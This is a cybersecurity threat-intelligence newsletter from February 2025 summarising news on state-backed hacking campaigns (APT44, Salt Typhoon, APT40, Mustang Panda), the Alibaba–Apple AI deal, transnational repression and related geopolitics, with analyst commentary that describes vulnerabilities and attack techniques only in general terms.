Thursday, Feb 13, 2025 // (IG): BB // GITHUB // SN R&D
Russian Hacking Group Expands Cyber Attacks on Critical Infrastructure Across U.S., UK, and Canada
Bottom Line Up Front (BLUF): The Russian state-backed hacking group Seashell Blizzard has significantly expanded its cyber espionage operations, targeting critical infrastructure in the U.S., UK, and Canada. Microsoft warns that the group is exploiting vulnerabilities in IT management software to infiltrate sectors such as energy, telecommunications, and defense.
Analyst Comments: This escalation underscores Russia’s continued use of cyber operations as a tool for geopolitical influence. The expansion beyond Ukraine to Western infrastructure indicates a shift toward broader strategic disruption. The group’s exploitation of vulnerabilities like those in ConnectWise ScreenConnect and Fortinet FortiClient EMS demonstrates how commonly used enterprise software can become high-impact attack vectors. As geopolitical tensions persist, these operations could lay the groundwork for future disinformation campaigns, infrastructure sabotage, or espionage activities. Enterprises in critical sectors must prioritize patching vulnerabilities, segmenting networks, and adopting zero-trust frameworks to mitigate these evolving threats.
FROM THE MEDIA: Microsoft has identified Seashell Blizzard, also known as APT44 and linked to Russia's GRU military intelligence, as the perpetrator behind a growing wave of cyber intrusions since early 2024. The group's BadPilot campaign initially focused on Ukraine but has now extended into North America, Central Asia, and the Middle East. Microsoft reports that attackers have exploited vulnerabilities like CVE-2024-1709 in ConnectWise ScreenConnect and CVE-2023-48788 in Fortinet FortiClient EMS to gain persistent access to high-value networks. Their tactics include espionage, data exfiltration, and industrial control system (ICS) disruption. Key targets include arms manufacturers, energy grids, and government entities. Microsoft has advised immediate action to patch systems, monitor network activity, and enforce segmentation to mitigate potential damage.
READ THE STORY: CSO
ANALYST NOTE: The group's persistent exploitation of known vulnerabilities and advanced ICS disruption tactics poses significant risks to both public and private sector infrastructure. Recent case studies illustrate this growing threat, including operations targeting Western critical infrastructure in 2024 through software vulnerabilities impacting energy, telecommunications, and arms manufacturing sectors; supply chain attacks across Europe and Ukraine in 2023 via compromised IT service providers, enabling widespread data exfiltration; and the coordinated 2022 cyberattack against Ukraine’s power distribution infrastructure, which led to significant power outages and coincided with military actions. These cases highlight APT44's adaptive tactics and the importance of proactive defense mechanisms, international collaboration, and continuous monitoring to counter the evolving threat landscape.
Alibaba Partners with Apple to Power AI Features in China, Raising National Security Concerns
Bottom Line Up Front (BLUF): Alibaba has announced a partnership with Apple to provide AI capabilities for iPhone models sold in China. While this move helps Apple comply with local regulations, it raises potential national security concerns over data access and privacy, as a Chinese state-linked tech giant will now have a presence on millions of iPhones.
Analyst Comments: This partnership represents a significant shift in Apple's approach to the Chinese market, but it also introduces potential security risks. By integrating Alibaba’s Qwen AI model into its devices, Apple may expose user data to Chinese regulatory oversight. China’s data laws, including the Cybersecurity Law and Data Security Law, grant authorities broad access to data collected within the country. Security experts warn that this could enable state actors to monitor or intercept sensitive communications, particularly given Alibaba’s history of cooperation with Chinese authorities. The deal may also strain Apple's relationship with Western regulators, who have increasingly scrutinized Chinese tech firms for potential espionage activities.
FROM THE MEDIA: Alibaba chairman Joe Tsai revealed the partnership during a conference in Dubai, confirming that Apple chose Alibaba after exploring partnerships with several Chinese AI providers, including Baidu, Tencent, and ByteDance. The decision follows regulatory requirements mandating that AI models used in China undergo approval from government authorities. Alibaba's Qwen 2.5 model will power new AI features on iPhones sold in China, a move designed to help Apple remain competitive in a market where domestic competitors have already integrated advanced AI capabilities. However, the partnership has prompted concerns about the potential for state surveillance, given China's history of using domestic tech firms to support intelligence-gathering efforts. Alibaba’s stock has surged more than 40% since the start of the year following the announcement.
READ THE STORY: FT
ANALYST NOTE: The integration of Alibaba’s AI technology raises significant privacy and security issues. Under China’s National Intelligence Law, companies are required to assist state intelligence efforts when requested. While Apple has historically maintained strong encryption and privacy protections, the presence of Alibaba's AI infrastructure could create new attack vectors for surveillance or cyber espionage. Experts fear this could compromise not only individual privacy but also corporate and governmental communications, especially if foreign travelers’ devices interact with these systems. Western governments may respond with heightened scrutiny of Apple’s global operations, potentially impacting its market position outside China.
Google Warns of Growing Collaboration Between Cybercriminals and State-Sponsored Hackers
Bottom Line Up Front (BLUF): Google's Threat Intelligence Group has reported an increasing collaboration between cybercriminal organizations and state-sponsored hackers from Russia, China, Iran, and North Korea. This growing convergence threatens critical infrastructure globally, with healthcare, finance, and defense sectors being prime targets. Google calls for stronger regulatory frameworks and cross-border cooperation to combat the trend.
Analyst Comments: The merging of state-sponsored tactics with criminal enterprises creates a more elusive and cost-effective cyber threat landscape. By outsourcing operations to criminal groups, nation-states can obscure attribution and scale their capabilities quickly. Russia's reliance on cybercrime marketplaces is particularly notable, but similar patterns are emerging in China, Iran, and North Korea. As these alliances grow, existing defense strategies may need reevaluation to account for the dual-purpose nature of these actors. Enhanced public-private partnerships and legal frameworks will be essential to mitigate the risks.
FROM THE MEDIA: Google has identified a growing convergence between state-sponsored hackers and cybercriminal groups, with Russian group APT44 (Sandworm) standing out for its use of underground marketplaces to acquire malicious tools and infrastructure. Chinese and Iranian actors have similarly leveraged these services to exploit network vulnerabilities, while North Korean hackers have focused on financial gains through ransomware and cryptocurrency theft. The report also highlights the healthcare sector as a prime target, with ransomware attacks in 2024 disrupting hospital operations in the U.S., UK, and Romania. In response, Google urges governments to prioritize cybersecurity as a national security issue and implement policies that incentivize secure-by-design software development.
READ THE STORY: The Register
China’s Transnational Repression Tactics Target Global Diaspora Communities
Bottom Line Up Front (BLUF): China has significantly expanded its transnational repression efforts, using surveillance, intimidation, and coercion to silence dissent within global diaspora communities. A recent Swiss government report indicates that Beijing has pressured Tibetans and Uyghurs abroad to act as informants while employing sophisticated cyber tactics to monitor and control these groups. These activities pose long-term risks to national sovereignty and fundamental freedoms worldwide.
Analyst Comments: The growing use of transnational repression highlights the CCP's ability to project domestic control mechanisms abroad. Cyber capabilities, combined with traditional intimidation tactics, allow Beijing to suppress criticism while maintaining plausible deniability. Operations like Operation Fox Hunt, initially framed as anti-corruption, have evolved into tools for targeting political dissidents. This shift reflects a broader authoritarian trend, with other regimes likely to adopt similar tactics if left unchecked. International collaboration and updated legal frameworks are essential to safeguarding diaspora communities from foreign interference.
FROM THE MEDIA: A Swiss government report published in February 2025 revealed that China has been actively targeting Tibetan and Uyghur communities in Switzerland through transnational repression tactics. The study, conducted by the University of Basel, highlighted Beijing’s use of coercion to recruit diaspora members as informants, alongside cyberattacks aimed at monitoring activists. Officials warn that these activities undermine Swiss sovereignty and are expected to intensify as digital surveillance technologies advance. China’s Foreign Ministry rejected the report, with spokesman Guo Jiakun condemning it as "wrong information" and urging Switzerland to respect Beijing’s "core interests." The Swiss findings align with similar reports from the Netherlands and Canada, where officials have raised alarms about Chinese espionage targeting political, academic, and religious figures. International human rights organizations continue to call for coordinated action to address the growing threat of transnational repression.
READ THE STORY: The Register
Foreign Threat Actors Intensify Disinformation Campaigns Targeting U.S. Communities
Bottom Line Up Front (BLUF): State-sponsored actors from Russia, China, and Iran are ramping up efforts to manipulate public opinion and destabilize local communities across the United States. Using advanced technologies like generative AI, these campaigns target social, political, and electoral discourse at both state and local levels.
Analyst Comments: The shift from national to local influence operations indicates a tactical evolution in foreign disinformation strategies. By targeting community-level discussions, adversaries aim to erode trust in democratic institutions and sow long-term societal discord. The use of generative AI to craft realistic fake personas, images, and narratives significantly increases the reach and effectiveness of these campaigns. To counter this, federal and local authorities must collaborate to enhance public awareness and fortify information-sharing protocols across jurisdictions.
FROM THE MEDIA: These actors employ generative AI to fabricate news articles and conspiracy theories, as seen in China’s dissemination of false narratives about the Hawaii wildfires. Social media manipulation remains a primary tactic, with bots and trolls amplifying divisive content around immigration and racial tensions. In addition, foreign actors have launched fake local news sites to lend credibility to propaganda. Russian operatives have been linked to voter fraud claims during the 2024 elections, while Iranian hackers have impersonated officials to intimidate voters. Experts warn that these operations could intensify as the 2025 election cycle approaches.
READ THE STORY: GBhackers
Dutch Officials Warn of Surge in Chinese Cyber Espionage Ahead of NATO Summit
Bottom Line Up Front (BLUF): The Dutch government has warned of an expected increase in Chinese espionage activities targeting key sectors like semiconductors, aerospace, and maritime infrastructure in the lead-up to the NATO summit in The Hague in June 2025. Intelligence reports indicate that Chinese state-backed hackers have already compromised a Dutch military network and are intensifying efforts to access sensitive technology.
Analyst Comments: The anticipated espionage surge reflects China's ongoing efforts to acquire advanced technological capabilities, particularly in semiconductor manufacturing, which is crucial for its military modernization. ASML Holding NV, a global leader in lithography machines, is a prime target. The Netherlands' decision to publicly attribute these activities to China demonstrates a shift toward greater transparency and international collaboration in countering state-sponsored cyber threats. As NATO prepares to address cybersecurity challenges at its summit, this warning underscores the growing role of cyber operations in geopolitical competition.
FROM THE MEDIA: Dutch Foreign Affairs Minister Caspar Veldkamp, during a parliamentary debate, highlighted that sectors like semiconductors, aerospace, and maritime institutions face elevated espionage risks. He asserted that the government has "sufficient evidence" linking these activities to Chinese state actors. In 2023, Dutch intelligence agencies confirmed that Chinese hackers infiltrated a military network, marking the first such public attribution. Reports from 2024 further revealed that China employs both legal collaborations and illicit espionage tactics to acquire advanced technologies. The Netherlands' strategic importance, coupled with the presence of ASML, makes it a focal point for these operations.
READ THE STORY: Bloomberg
RA World Ransomware Attack in South Asia Linked to Chinese Cyber Espionage Toolset
Bottom Line Up Front (BLUF): A recent RA World ransomware attack targeting a South Asian software company has been linked to Chinese state-backed espionage tools. Symantec researchers discovered that tools previously associated with Mustang Panda were used, raising concerns about potential moonlighting within Chinese cyber operations.
Analyst Comments: The discovery of espionage tools in a financially motivated ransomware attack signals a potential shift in tactics among Chinese threat actors. Historically focused on intelligence gathering, groups like Mustang Panda may be diversifying into ransomware, possibly as individual operators seek financial gain. This blending of state-sponsored techniques with criminal objectives complicates attribution and increases risks for regional infrastructure. The potential use of the PlugX malware in both espionage and ransomware contexts also suggests an evolving and more aggressive operational strategy.
FROM THE MEDIA: The Symantec Threat Hunter Team reported that the November 2024 ransomware attack against a South Asian software company involved the use of PlugX malware, typically linked to Chinese espionage group Mustang Panda. Attackers exploited a vulnerability in Palo Alto Networks PAN-OS (CVE-2024-0012) to infiltrate the network. The toolset was previously seen in espionage campaigns against European foreign ministries and Southeast Asian government entities. Researchers suspect a lone actor within the espionage network may have pivoted to ransomware for personal profit, a behavior more commonly associated with Iranian and North Korean cyber actors.
READ THE STORY: THN PoC: CVE-2024-0012
ANALYST NOTE: Command injection involves exploiting application vulnerabilities to execute arbitrary commands on a host operating system. This tactic allows attackers to manipulate system functions and access sensitive data with ease. Reverse shells, on the other hand, enable remote control by establishing a connection from the compromised system back to the attacker's machine, effectively bypassing inbound firewall restrictions.
Nation-state actors, particularly from countries like China and Russia, have been documented using these techniques for intelligence gathering and cyber operations. For example, Chinese military hackers have targeted critical infrastructure, including water utilities, ports, and energy facilities, with the strategic objective of disrupting Pacific military supply lines. Similarly, Russian state-sponsored groups, such as Sandworm, have infiltrated Western networks, particularly in the energy and defense sectors, leveraging tools like Atera Agent and Splashtop Remote Services to maintain persistent access.
Huawei’s Revenue Surges Despite Sanctions, Challenging Global Restrictions
Bottom Line Up Front (BLUF): Huawei reported a 22% revenue growth for 2024, reaching ¥860 billion ($118.25 billion), despite U.S.-led sanctions targeting its telecom and consumer technology businesses. The company attributes this growth to its strong ICT infrastructure, a recovering consumer segment, and the rapid development of its smart car solutions.
Analyst Comments: The company’s diversification into automotive solutions and domestic market reliance appears to have mitigated the impact of global restrictions. This growth could encourage further investment in indigenous tech capabilities, potentially challenging the dominance of U.S. firms in the long run. Additionally, it raises questions about the effectiveness of existing sanctions and may prompt calls for stricter enforcement or expanded measures.
FROM THE MEDIA: Huawei chairman Liang Hua announced the 22% year-over-year growth at a recent conference, emphasizing the stability of the company’s ICT division and the resurgence of its consumer segment. The company's smart car solutions business is also gaining momentum, suggesting successful diversification beyond traditional telecom sectors. This growth occurs despite the 2020 divestiture of its Honor smartphone brand and ongoing restrictions from countries like the U.S., UK, and Australia. The Shenzhen Business Daily noted that Huawei’s success contrasts with the broader struggles of China’s economy, highlighting the firm's adaptive strategies and market positioning.
READ THE STORY: MSN
Indian Army Urged to Embrace Subterranean Warfare to Counter China's Technological Edge
Bottom Line Up Front (BLUF): The Indian Army should adopt subterranean warfare tactics in mountainous and high-altitude regions to counter China's superior precision-guided munitions (PGMs), electronic, and cyber warfare capabilities. Learning from historical and contemporary examples like Hamas' tunnel strategy in Gaza can help India build cost-effective defenses against modern aerial and cyber threats.
Analyst Comments: Subterranean warfare provides a strategic advantage against technologically advanced adversaries. China's investment in underground military infrastructure and Hamas' surprising resilience in Gaza underscore the importance of such tactics. India's adoption of tunnel defenses could mitigate China's superiority in PGMs and cyber warfare while serving as a cost-efficient alternative to expensive air and missile defense systems. Moving forward, collaboration with experienced allies like Vietnam and leveraging domestic expertise from the Border Roads Organisation (BRO) will be critical.
FROM THE MEDIA: China is constructing a massive underground military command center in Beijing, reportedly 10 times larger than the Pentagon, to protect key leadership during potential conflicts. In recent conflicts, Hamas' use of tunnels helped the group survive extensive Israeli airstrikes. Drawing from these examples, retired Lt Gen H S Panag advocates for India to develop similar defenses along the Line of Actual Control (LAC) with China. Panag emphasizes that India's defenses in high-altitude areas are outdated and vulnerable to modern PGMs and electronic warfare. He estimates that fortifying defenses in Eastern Ladakh with tunnels could cost around ₹8,700 crore—far less than high-end missile defense systems.
READ THE STORY: The Print
U.S. Releases Russian Cybercriminal Alexander Vinnik in Prisoner Swap for Detained American Teacher
Bottom Line Up Front (BLUF): Alexander Vinnik, a Russian cybercriminal linked to the BTC-e cryptocurrency exchange, has been released from U.S. custody in a prisoner swap for American teacher Marc Fogel. Vinnik had been convicted of laundering billions of dollars through the exchange, which facilitated cybercrime activities, including ransomware operations and identity theft.
Analyst Comments: The release of Vinnik underscores the geopolitical complexities of cybercrime prosecutions. BTC-e was a central hub for illicit activity, processing proceeds from ransomware, hacking campaigns, and fraud on a global scale. While prisoner swaps may serve diplomatic objectives, they can also create challenges for international cybercrime enforcement, potentially emboldening other state-backed or independent actors. Vinnik’s return to Russia raises concerns about his potential involvement in future cyber operations, given Moscow’s history of leveraging cyber expertise for state-sponsored activities.
FROM THE MEDIA: Alexander Vinnik, the Russian operator of the now-defunct BTC-e exchange, was reportedly released from U.S. custody as part of a prisoner swap with Russia. In exchange, the Kremlin released Marc Fogel, a U.S. citizen detained on drug-related charges since 2021. Vinnik was initially arrested in Greece in 2017 and later extradited to the U.S., where he pleaded guilty to conspiracy to commit money laundering. The BTC-e platform, according to the U.S. Department of Justice, processed over $4 billion in illicit funds, including proceeds from ransomware attacks, identity theft, and narcotics trafficking. Vinnik was ordered to forfeit $100 million before his release. Kremlin spokesperson Dmitry Peskov confirmed the swap, though U.S. officials have yet to issue an official statement.
READ THE STORY: The Record
Samoa Attributes Cyber Attacks to China-Backed APT40, Warns of Regional Threat
Bottom Line Up Front (BLUF): Samoa’s government has publicly attributed recent cyber attacks targeting critical infrastructure to the Chinese state-sponsored hacking group APT40. This is the first time a Pacific Island nation has directly linked such activities to a Chinese government-affiliated group, raising concerns about growing cyber threats across the Blue Pacific.
Analyst Comments: APT40’s infiltration of Pacific Island networks underscores China’s persistent focus on gathering intelligence in strategically significant regions. The group’s ability to remain undetected for extended periods poses a long-term risk to government operations and critical infrastructure. Samoa’s decision to publicly identify the group may encourage other Pacific nations to follow suit, promoting greater regional cooperation in cybersecurity defense efforts. The involvement of international actors like Australia, which has increased cyber assistance in the region, indicates growing geopolitical attention to these threats.
FROM THE MEDIA: The National Computer Emergency Response Team (CERT) of Samoa has warned of "malicious cyber operations" targeting government and critical infrastructure systems across the Pacific. The attackers, identified as APT40, are known to operate under the PRC Ministry of State Security. According to the advisory, the group uses sophisticated malware and GRE tunnels to maintain persistent access and steal sensitive data. In response, Australia has deployed its Cyber RAPID team to assist Pacific nations with defensive measures. The report follows New Zealand’s recent accusation that APT40 was behind a 2024 cyber attack on its parliamentary systems. Beijing has denied all allegations, maintaining that it does not engage in state-sponsored cyber espionage.
READ THE STORY: IB
Items of interest
Chinese Hackers Exploit Cisco Routers to Spy on Telecoms Worldwide
Bottom Line Up Front (BLUF): The Chinese state-sponsored hacking group Salt Typhoon has continued its espionage activities by exploiting vulnerabilities in Cisco routers to infiltrate global telecom networks. Recent attacks targeted at least five telecoms and multiple universities across the U.S., Asia, and Europe, with a focus on stealing sensitive communications data.
Analyst Comments: This persistent activity highlights the challenges of defending legacy network infrastructure from sophisticated state-sponsored actors. The attackers’ ability to maintain access using Cisco router vulnerabilities underscores the need for proactive patching and network monitoring. Their interest in telecom and university networks suggests a long-term strategy to gather intelligence on communications infrastructure and research advancements, potentially informing future Chinese technological capabilities.
FROM THE MEDIA: According to cybersecurity firm Recorded Future, the hacking group—tracked as "RedMike"—exploited two Cisco IOS vulnerabilities to breach telecoms and universities between December 2024 and January 2025. The attackers used web interfaces of over 1,000 exposed Cisco devices to gain root access and create GRE tunnels for persistent network infiltration. Victims include a U.S. ISP, a U.K. telecom’s U.S. affiliate, and institutions like UCLA and Utah Tech. Despite public exposure, sanctions, and warnings from CISA and the FBI, the espionage operations remain active, with experts suggesting the campaign is far more extensive than currently documented.
READ THE STORY: Wired // NextGov
Salt Typhoon Telecom Attack | State of Cybercrime (Video)
FROM THE MEDIA: Matt and David delve into the evolving story of Salt Typhoon, a Chinese state-sponsored group, and their use of the innovative 'GhostSpider' backdoor to infiltrate telecommunication service providers. This sophisticated and far-reaching cyberattack, which is much larger than previously understood, has compromised sensitive cellular logs and data from government entities, telecom providers, and millions of Americans
China's Power is Peaking. Here's Why that's Dangerous (Video)
FROM THE MEDIA: China's rise has been remarkable but is now facing significant headwinds. The economy is slowing, the population is aging, and the nation's political landscape is becoming more rigid. Historically, great powers at their peak often seek to consolidate influence, potentially through coercive actions. This dynamic makes the coming decade particularly volatile for regional and global stability.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.